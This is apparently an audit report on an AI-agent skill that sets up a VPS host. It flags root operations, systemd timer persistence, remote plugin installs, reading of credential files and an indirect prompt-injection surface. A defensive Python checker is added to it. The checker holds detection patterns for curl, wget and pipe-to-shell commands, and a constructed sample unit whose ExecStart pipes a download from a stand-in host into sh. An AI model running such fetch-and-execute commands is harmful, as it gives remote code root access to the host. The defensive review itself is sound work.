ln-031-vps-host-runtime
Warn
Audited by Gen Agent Trust Hub on May 5, 2026
Risk Level: MEDIUM
Tags: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: Performs high-privilege system operations as root, including apt package installation, GitHub/GitLab CLI setup, and writes to system-wide directories such as /usr/local/bin and /var/lib/.
- [COMMAND_EXECUTION]: Installs and configures system-wide persistence via systemd units (agent-update.service, agent-update.timer) that maintain access and perform automated updates; whatever the timer's service runs executes on the host on a schedule, without further user interaction.
- [EXTERNAL_DOWNLOADS]: Clones a "skills marketplace" and installs selected plugins from remote sources, introducing a dependency on external code that is executed with the agent's permissions.
- [DATA_EXFILTRATION]: Accesses and verifies sensitive file paths, including SSH directory ownership, claude and codex login/auth files, and project-specific trust blocks; the same access that verifies these files could expose the credentials they hold.
- [PROMPT_INJECTION]: Has an indirect injection surface: it ingests external data from "contracts" and marketplace plugins, which may carry instructions that override the agent's behavior or safety protocols.
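A check a practitioner would run on the host after installing this skill, added here as an example (it is not code from the skill or from the Trust Hub audit): locate systemd units with the names the audit reports and summarise what each one executes, as which user, and on what schedule, since that is what decides whether the persistence finding is benign housekeeping or scheduled execution of remote code. The unit file contents embedded in the block are constructed to match the audit's description and are not the skill's real files; the directory list and the name pattern `agent-update.*` are assumptions taken from the findings above.

```python
"""Inspect systemd units of the kind the audit flags (agent-update.service,
agent-update.timer): what they run, as which user, and on what schedule.
Added example; the unit texts below are constructed samples, not the skill's
real files."""
import glob
import os
import re
import shlex
from typing import Dict, List

Unit = Dict[str, Dict[str, List[str]]]
# ExecStart text that fetches remote code, or pipes a download into a shell.
_NETWORK_FETCH = re.compile(r"\b(curl|wget|git\s+(clone|pull)|pip3?\s+install|npm\s+(i|install))\b")
_PIPE_TO_SHELL = re.compile(r"\|\s*(sudo\s+)?(ba)?sh\b")
_SYSTEM_PATHS = ("/usr/local/bin", "/var/lib")  # directories the audit says are modified
# System units run as root unless User= is set; user units run as that user.
UNIT_DIRS = ["/etc/systemd/system", "/usr/lib/systemd/system", "/lib/systemd/system",
             os.path.expanduser("~/.config/systemd/user")]


def parse_unit(text: str) -> Unit:
    """Minimal unit-file parser; values are lists since ExecStartPre etc. may repeat."""
    unit: Unit = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            unit.setdefault(section, {})
            continue
        if section is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        unit[section].setdefault(key.strip(), []).append(value.strip())
    return unit


def assess_service(unit: Unit) -> List[str]:
    """Human-readable findings for a .service unit."""
    svc = unit.get("Service", {})
    cmds = [c for k in ("ExecStartPre", "ExecStart", "ExecStartPost") for c in svc.get(k, [])]
    if not cmds:
        return ["no ExecStart*: unit runs nothing"]
    findings = []
    if "User" not in svc:
        findings.append("runs as root (no User= in [Service])")
    for cmd in cmds:
        if _NETWORK_FETCH.search(cmd):
            findings.append(f"fetches remote code: {cmd}")
        if _PIPE_TO_SHELL.search(cmd):
            findings.append(f"pipes a download into a shell: {cmd}")
        # Drop systemd's ExecStart prefix characters (-@:+!) before tokenising.
        if any(t.startswith(_SYSTEM_PATHS) for t in shlex.split(cmd.lstrip("-@:+!"))):
            findings.append(f"references a system-wide path: {cmd}")
    return findings


def assess_timer(unit: Unit) -> List[str]:
    """When a .timer fires; Persistent= replays missed runs at boot."""
    timer = unit.get("Timer", {})
    out = [f"{k}={v}" for k in ("OnCalendar", "OnBootSec", "OnUnitActiveSec")
           for v in timer.get(k, [])]
    if timer.get("Persistent", ["no"])[-1].lower() in ("yes", "true", "on", "1"):
        out.append("Persistent=yes: missed runs are caught up after boot")
    return out


def audit_unit(name: str, text: str) -> List[str]:
    unit = parse_unit(text)
    return assess_timer(unit) if name.endswith(".timer") else assess_service(unit)


def find_units(pattern: str = "agent-update.*", dirs=UNIT_DIRS) -> List[str]:
    """Installed unit files matching the names the audit reports."""
    return sorted(p for d in dirs for p in glob.glob(os.path.join(d, pattern)))


# Constructed samples modelled on the audit's description, not the real files.
SAMPLE_SERVICE = """\
[Unit]
Description=Agent self-update (constructed sample)

[Service]
Type=oneshot
ExecStart=/bin/sh -c "curl -fsSL https://example.invalid/update.sh | sh"
ExecStartPost=/usr/local/bin/agent --reload
"""
SAMPLE_TIMER = """\
[Unit]
Description=Run agent-update on a schedule (constructed sample)

[Timer]
OnBootSec=5min
OnUnitActiveSec=1h
Persistent=true

[Install]
WantedBy=timers.target
"""

if __name__ == "__main__":
    for name, text in (("agent-update.service", SAMPLE_SERVICE), ("agent-update.timer", SAMPLE_TIMER)):
        print(name, "->", audit_unit(name, text))
    for path in find_units():  # then the real host, read-only
        with open(path, encoding="utf-8", errors="replace") as fh:
            print(path, "->", audit_unit(path, fh.read()))
```

Run it as the user who installed the skill; it only reads unit files. The three things to look at in the output are the ExecStart lines (does the update step download and execute something), whether `User=` is absent under /etc/systemd/system (then the job runs as root), and the timer directives plus `Persistent=` (how often, and whether missed runs are replayed after a reboot). A unit that fails any of these is the one to disable with `systemctl disable --now agent-update.timer` until its update source has been reviewed.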
Audit Metadata